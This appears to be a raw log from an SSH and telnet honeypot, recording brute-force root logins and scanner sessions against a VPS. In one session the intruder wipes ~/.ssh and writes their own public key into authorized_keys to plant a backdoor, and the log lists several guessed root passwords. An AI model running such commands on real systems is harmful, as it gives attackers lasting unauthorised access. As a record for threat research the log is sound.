{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"b6:d5:cc:b7:71:ac:76:df:0a:ca:66:27:9c:b0:4c:21","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDvUd/ZOkvsbY05wVY+K1fL3lD9Cgk4zLKXDZIQqTH+lVoUGRAtn88peI97fqSdARuMQT3s0Fcj0roSdOf259SCECKy/Qu6xyUY0Dn42ollgEBuXAElDbsf5lAlDz8zLJfgnLeOvrnj6gXQLmu/i44iDDjgPlwsf69xlRRA1Qi96N3HEQStI614sFwxtL2aPjUlCD2AxyKyKaRy02+b6Reul23EKpAI3mD1ctTGoU4dGqA1TAeZO9eVA7AgqdRC5C/1wykAI0NXR9gpjhPkWlw7qwP4JV7gWHcTxCrXwENFMO7md4Vug2Eyu6qg5oPysijuuJxMYAGDhaSyaO6f3lDp","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint b6:d5:cc:b7:71:ac:76:df:0a:ca:66:27:9c:b0:4c:21","sensor":"my-vps","timestamp":"2025-08-26T03:21:00.941511Z","src_ip":"139.19.117.131","session":"cd4a50e2c4d9"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"b6:d5:cc:b7:71:ac:76:df:0a:ca:66:27:9c:b0:4c:21","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDvUd/ZOkvsbY05wVY+K1fL3lD9Cgk4zLKXDZIQqTH+lVoUGRAtn88peI97fqSdARuMQT3s0Fcj0roSdOf259SCECKy/Qu6xyUY0Dn42ollgEBuXAElDbsf5lAlDz8zLJfgnLeOvrnj6gXQLmu/i44iDDjgPlwsf69xlRRA1Qi96N3HEQStI614sFwxtL2aPjUlCD2AxyKyKaRy02+b6Reul23EKpAI3mD1ctTGoU4dGqA1TAeZO9eVA7AgqdRC5C/1wykAI0NXR9gpjhPkWlw7qwP4JV7gWHcTxCrXwENFMO7md4Vug2Eyu6qg5oPysijuuJxMYAGDhaSyaO6f3lDp","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T03:21:00.942166Z","src_ip":"139.19.117.131","session":"cd4a50e2c4d9"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"b6:d5:cc:b7:71:ac:76:df:0a:ca:66:27:9c:b0:4c:21","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDvUd/ZOkvsbY05wVY+K1fL3lD9Cgk4zLKXDZIQqTH+lVoUGRAtn88peI97fqSdARuMQT3s0Fcj0roSdOf259SCECKy/Qu6xyUY0Dn42ollgEBuXAElDbsf5lAlDz8zLJfgnLeOvrnj6gXQLmu/i44iDDjgPlwsf69xlRRA1Qi96N3HEQStI614sFwxtL2aPjUlCD2AxyKyKaRy02+b6Reul23EKpAI3mD1ctTGoU4dGqA1TAeZO9eVA7AgqdRC5C/1wykAI0NXR9gpjhPkWlw7qwP4JV7gWHcTxCrXwENFMO7md4Vug2Eyu6qg5oPysijuuJxMYAGDhaSyaO6f3lDp","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint b6:d5:cc:b7:71:ac:76:df:0a:ca:66:27:9c:b0:4c:21","sensor":"my-vps","timestamp":"2025-08-26T03:21:00.960677Z","src_ip":"139.19.117.131","session":"cd4a50e2c4d9"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"b6:d5:cc:b7:71:ac:76:df:0a:ca:66:27:9c:b0:4c:21","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDvUd/ZOkvsbY05wVY+K1fL3lD9Cgk4zLKXDZIQqTH+lVoUGRAtn88peI97fqSdARuMQT3s0Fcj0roSdOf259SCECKy/Qu6xyUY0Dn42ollgEBuXAElDbsf5lAlDz8zLJfgnLeOvrnj6gXQLmu/i44iDDjgPlwsf69xlRRA1Qi96N3HEQStI614sFwxtL2aPjUlCD2AxyKyKaRy02+b6Reul23EKpAI3mD1ctTGoU4dGqA1TAeZO9eVA7AgqdRC5C/1wykAI0NXR9gpjhPkWlw7qwP4JV7gWHcTxCrXwENFMO7md4Vug2Eyu6qg5oPysijuuJxMYAGDhaSyaO6f3lDp","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T03:21:00.961341Z","src_ip":"139.19.117.131","session":"cd4a50e2c4d9"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:21:10.881831Z","src_ip":"139.19.117.131","session":"cd4a50e2c4d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41826,"dst_ip":"1.2.3.4","dst_port":22,"session":"2614038af424","protocol":"ssh","message":"New connection: 212.227.235.229:41826 (1.2.3.4:22) [session: 2614038af424]","sensor":"my-vps","timestamp":"2025-08-26T03:21:51.095894Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:21:51.673765Z","src_ip":"212.227.235.229","session":"2614038af424"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:21:51.674449Z","src_ip":"212.227.235.229","session":"2614038af424"}
{"eventid":"cowrie.login.success","username":"root","password":"Kalyan@123","message":"login attempt [root/Kalyan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:21:54.665342Z","src_ip":"212.227.235.229","session":"2614038af424"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:21:55.184340Z","src_ip":"212.227.235.229","session":"2614038af424"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36582,"dst_ip":"1.2.3.4","dst_port":23,"session":"de55bc66a461","protocol":"telnet","message":"New connection: 212.227.235.229:36582 (1.2.3.4:23) [session: de55bc66a461]","sensor":"my-vps","timestamp":"2025-08-26T03:22:06.738355Z"}
{"eventid":"cowrie.session.closed","duration":0.30800771713256836,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:07.046289Z","src_ip":"212.227.235.229","session":"de55bc66a461"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36790,"dst_ip":"1.2.3.4","dst_port":23,"session":"762650e96190","protocol":"telnet","message":"New connection: 212.227.235.229:36790 (1.2.3.4:23) [session: 762650e96190]","sensor":"my-vps","timestamp":"2025-08-26T03:22:07.339373Z"}
{"eventid":"cowrie.session.closed","duration":9.706998109817505,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:17.046298Z","src_ip":"212.227.235.229","session":"762650e96190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39804,"dst_ip":"1.2.3.4","dst_port":23,"session":"261d85dace97","protocol":"telnet","message":"New connection: 212.227.235.229:39804 (1.2.3.4:23) [session: 261d85dace97]","sensor":"my-vps","timestamp":"2025-08-26T03:22:17.339486Z"}
{"eventid":"cowrie.session.closed","duration":9.706899166107178,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:27.046294Z","src_ip":"212.227.235.229","session":"261d85dace97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43036,"dst_ip":"1.2.3.4","dst_port":23,"session":"72ed9692ad52","protocol":"telnet","message":"New connection: 212.227.235.229:43036 (1.2.3.4:23) [session: 72ed9692ad52]","sensor":"my-vps","timestamp":"2025-08-26T03:22:27.351570Z"}
{"eventid":"cowrie.session.closed","duration":9.694579362869263,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:37.046080Z","src_ip":"212.227.235.229","session":"72ed9692ad52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46144,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e4ecd4271a0","protocol":"telnet","message":"New connection: 212.227.235.229:46144 (1.2.3.4:23) [session: 8e4ecd4271a0]","sensor":"my-vps","timestamp":"2025-08-26T03:22:37.346050Z"}
{"eventid":"cowrie.session.closed","duration":0.0014264583587646484,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:37.347398Z","src_ip":"212.227.235.229","session":"8e4ecd4271a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46356,"dst_ip":"1.2.3.4","dst_port":23,"session":"42c4f28642d5","protocol":"telnet","message":"New connection: 212.227.235.229:46356 (1.2.3.4:23) [session: 42c4f28642d5]","sensor":"my-vps","timestamp":"2025-08-26T03:22:37.938740Z"}
{"eventid":"cowrie.session.closed","duration":0.0016217231750488281,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:37.940227Z","src_ip":"212.227.235.229","session":"42c4f28642d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46530,"dst_ip":"1.2.3.4","dst_port":23,"session":"45993761545c","protocol":"telnet","message":"New connection: 212.227.235.229:46530 (1.2.3.4:23) [session: 45993761545c]","sensor":"my-vps","timestamp":"2025-08-26T03:22:38.540493Z"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 212.227.235.229:23","message":"login attempt [GET / HTTP/1.1/Host: 212.227.235.229:23] failed","sensor":"my-vps","timestamp":"2025-08-26T03:22:38.541659Z","src_ip":"212.227.235.229","session":"45993761545c"}
{"eventid":"cowrie.login.failed","username":"Accept: */*","password":"","message":"login attempt [Accept: */*/] failed","sensor":"my-vps","timestamp":"2025-08-26T03:22:38.543267Z","src_ip":"212.227.235.229","session":"45993761545c"}
{"eventid":"cowrie.session.closed","duration":0.3106038570404053,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:38.851011Z","src_ip":"212.227.235.229","session":"45993761545c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46778,"dst_ip":"1.2.3.4","dst_port":23,"session":"4cd20da0c476","protocol":"telnet","message":"New connection: 212.227.235.229:46778 (1.2.3.4:23) [session: 4cd20da0c476]","sensor":"my-vps","timestamp":"2025-08-26T03:22:39.159412Z"}
{"eventid":"cowrie.session.closed","duration":0.30925488471984863,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:39.468588Z","src_ip":"212.227.235.229","session":"4cd20da0c476"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46940,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e6c7b028694","protocol":"telnet","message":"New connection: 212.227.235.229:46940 (1.2.3.4:23) [session: 8e6c7b028694]","sensor":"my-vps","timestamp":"2025-08-26T03:22:39.776137Z"}
{"eventid":"cowrie.session.closed","duration":0.30788421630859375,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:22:40.083932Z","src_ip":"212.227.235.229","session":"8e6c7b028694"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49338,"dst_ip":"1.2.3.4","dst_port":22,"session":"c508d74da0fa","protocol":"ssh","message":"New connection: 217.72.205.35:49338 (1.2.3.4:22) [session: c508d74da0fa]","sensor":"my-vps","timestamp":"2025-08-26T03:24:23.344749Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:24:23.346546Z","src_ip":"217.72.205.35","session":"c508d74da0fa"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":41616,"dst_ip":"1.2.3.4","dst_port":22,"session":"5dacff59bac0","protocol":"ssh","message":"New connection: 45.88.8.186:41616 (1.2.3.4:22) [session: 5dacff59bac0]","sensor":"my-vps","timestamp":"2025-08-26T03:24:38.955192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:24:39.344373Z","src_ip":"45.88.8.186","session":"5dacff59bac0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:24:39.345025Z","src_ip":"45.88.8.186","session":"5dacff59bac0"}
{"eventid":"cowrie.login.success","username":"root","password":"Amir1371","message":"login attempt [root/Amir1371] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:24:41.750113Z","src_ip":"45.88.8.186","session":"5dacff59bac0"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:24:42.313768Z","src_ip":"45.88.8.186","session":"5dacff59bac0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60023,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c46149d36e4","protocol":"ssh","message":"New connection: 212.227.235.229:60023 (1.2.3.4:22) [session: 0c46149d36e4]","sensor":"my-vps","timestamp":"2025-08-26T03:25:12.627879Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46244,"dst_ip":"1.2.3.4","dst_port":22,"session":"130de1b8c3b1","protocol":"ssh","message":"New connection: 212.227.235.229:46244 (1.2.3.4:22) [session: 130de1b8c3b1]","sensor":"my-vps","timestamp":"2025-08-26T03:26:51.728642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:26:51.729595Z","src_ip":"212.227.235.229","session":"130de1b8c3b1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:26:51.990801Z","src_ip":"212.227.235.229","session":"130de1b8c3b1"}
{"eventid":"cowrie.login.failed","username":"aa","password":"1","message":"login attempt [aa/1] failed","sensor":"my-vps","timestamp":"2025-08-26T03:26:53.076409Z","src_ip":"212.227.235.229","session":"130de1b8c3b1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:26:54.340550Z","src_ip":"212.227.235.229","session":"130de1b8c3b1"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:27:12.649053Z","src_ip":"212.227.235.229","session":"0c46149d36e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39296,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ca397ce386e","protocol":"ssh","message":"New connection: 212.227.235.229:39296 (1.2.3.4:22) [session: 5ca397ce386e]","sensor":"my-vps","timestamp":"2025-08-26T03:27:42.935618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:27:42.937100Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:27:43.177090Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test8888","message":"login attempt [root/Test8888] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:27:44.181025Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:27:44.706935Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:27:44.707983Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:27:44.709710Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:27:44.952041Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:27:45.449350Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:27:45.450037Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:27:45.692596Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:27:45.693642Z","src_ip":"212.227.235.229","session":"5ca397ce386e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39310,"dst_ip":"1.2.3.4","dst_port":22,"session":"77a6df05f42f","protocol":"ssh","message":"New connection: 212.227.235.229:39310 (1.2.3.4:22) [session: 77a6df05f42f]","sensor":"my-vps","timestamp":"2025-08-26T03:27:45.936084Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:27:45.936972Z","src_ip":"212.227.235.229","session":"77a6df05f42f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:27:46.181053Z","src_ip":"212.227.235.229","session":"77a6df05f42f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:27:47.200694Z","src_ip":"212.227.235.229","session":"77a6df05f42f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:27:48.448626Z","src_ip":"212.227.235.229","session":"77a6df05f42f"}
